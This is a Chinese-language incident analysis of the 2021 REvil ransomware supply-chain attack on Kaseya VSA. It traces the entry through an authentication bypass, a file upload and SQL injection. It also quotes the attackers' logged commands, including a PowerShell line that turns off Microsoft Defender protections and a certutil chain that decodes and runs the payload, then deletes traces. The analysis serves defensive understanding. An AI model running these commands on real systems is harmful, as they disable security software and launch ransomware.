针对Sodinokibi黑客组织供应链攻击Kaseya VSA的分析溯源

前言

2021年7月2日，Sodinokibi(REvil)勒索病毒黑客组织疑似利用0day漏洞，通过Kaseya VSA发起大规模供应链攻击行动，此次事件影响范围广泛，目前瑞典最大链锁超市之一的Coop受此供应链勒索攻击事件影响被迫关闭全国约800多家商店服务。

国内微步在线对此次事件进行了相关分析报道，对Sodinokibi勒索病毒以及这次攻击不太了解的朋友，可以先参考之前的报告，事实上此次的供应链攻击影响还是蛮大的，攻击手法和攻击技术也是非常完整的，Kaseya VSA没有透露过多的攻击细节和漏洞细节，美国网络安全和基础设施安全局对此次供应链攻击事件已经界入调查。

分析溯源

此次Sodinokibi(REvil)勒索病毒黑客组织利用相关漏洞发起供应链攻击，这不是一次简单的攻击行动，笔者没有机会也没有办法去参与到这次的勒索攻击溯源行动，只能根据国外某安全厂商的溯源报告以及其他一些渠道获取到相关的溯源信息，对此次供应链攻击行动进行部分的分析还原，并不完整，更多的攻击细节笔者因为没有拿到相关的文件、日志数据，也没办法进行更深入的分析溯源。

分析系统日志的时候，发现了一个AWS IP地址：18[.]223.199.234发送POST请求，如下所示：

通过分析发现这个userFilterTableRpt.asp中包含大量潜在的SQL注入漏洞，这些漏洞为后面代码执行和破坏VSA服务器提供了基础条件。

同时我们在请求日志中还发现dl.asp和KUpload.dll这两个文件，通过分析发现dl.asp存在身份验证逻辑缺陷，这种存在缺陷的身份验证可以绕过服务器的检测，授予用户有效会话,KUpload.dll提供上传功能，并将日志记录到文件KUpload.log文件。

根据分析，我们发现KUpload.log文件内容中包含已经上传了agent.crt和Screenshot.jpg文件到VSA服务器，agent.crt通过VSA的解密机制，解密出勒索病毒并加载，但是Screenshot.jpg文件是什么还未知，安全研究人员也在向外界寻求这个文件，相关日志记录，如下所示：

从上面的分析，我们可以确认，此次的攻击入口点应该为Kaseya VSA的WEB应用，黑客组织通过使用身份验证漏洞绕过获得经过身份验证的会话，上传原始有效负载，然后通过SQL注入漏洞执行命令。

国外安全研究人员，正在与AWS和执法部门合作调查 18[.]223.199.234 这个IP 地址，后续看有没有更多的信息发布吧。

此次供应链攻击调查分析溯源第一阶段，如下所示：

这里有一个文件没有找到Screenshot.jpg，不确定这个文件是做什么的，所以对分析溯源更多的信息会有一些影响。

agent.crt被上传到了VSA服务器上，然后通过调查黑客组织利用PowerShell脚本执行相关的命令行，如下所示：

1.测试网络

C:\WINDOWS\system32\cmd.exe /c ping 127.0.0.1 -n 4979 > null

2.关闭Microsoft Defender提供的核心恶意软件和反勒索软件保护

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

3.拷贝certutil.exe程序到系统上命名为cert.exe，然后使用cert.exe程序解密之前上传的agent.crt生成agent.exe

copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe

通过VSA的更新流行执行恶意更新程序agent.exe，释放勒索病毒payload，利用Window Defender程序加载执行，使用白+黑的方式。

此次供应链攻击调查分析溯源第二阶段，如下所示：

笔者没有机会参加这次勒索病毒的溯源分析，也没有办法拿到一些相关的文件和日志数据等，仅仅从国外相关厂商和一些外界的报告部分还原了这次供应链攻击的一些过程，其实国外这家厂商也并没有完整的还原整个攻击过程，因为还有部分的文件并没有拿到，可能是被黑客组织删除了，笔者曾应急处理过很多包含勒索病毒以及其他恶意软件相关的溯源分析工作，很多时候在溯源分析过程中，因为黑客组织删除了系统或产品的一些日志以及恶意软件相关信息，导致无法溯源到完整的攻击过程，只能是基于自己的经验以及捕获到的现有的日志数据和恶意文件进行分析溯源，事实上也只有黑客组织才真正清楚每一次攻击的完整过程，安全分析人员只能基于系统上残留的现有的日志以及恶意文件去分析溯源，还原攻击过程，做好相应的应急响应、检测、防御等工作，分析溯源本身是一件很复杂的工作，依懒很多客观因素，同时也需要更多的相关日志，以及捕获到对应的恶意软件。

通过国外的安全厂商的分析溯源，可以看出这次Sodinokibi(REvil)勒索病毒发起的供应链攻击并不简单，里面不仅仅可能利用一些0day漏洞，而且在主机系统的免杀方面也做了很多工作，黑客组织对Kaseya VSA系统也非常熟悉，做了很多前期的相关研究工作，然后再发起定向攻击，同时白+黑也是APT攻击活动中经常使用的攻击手法，正如笔者之前提到的勒索病毒黑客组织已经开始使用APT的攻击手法进行完整的定向攻击行动。

根据笔者应急处理的很多勒索病毒相关案例，勒索病毒黑客组织往往都喜欢在周五的时候发起大规模的勒索病毒攻击行动，难倒是为了对应“黑色星期五”的意思？可以发现很多重大的勒索病毒攻击事件都是发生在周五。

最后Sodinokibi(REvil)勒索病毒黑客组织要求7000万美元发布一个通用解密器，能够解锁在这次供应链攻击过程中所有被攻击加密的计算机，并在他们在暗网上的博客中，声称在事件期间阻止了超过一百万个系统，如下所示：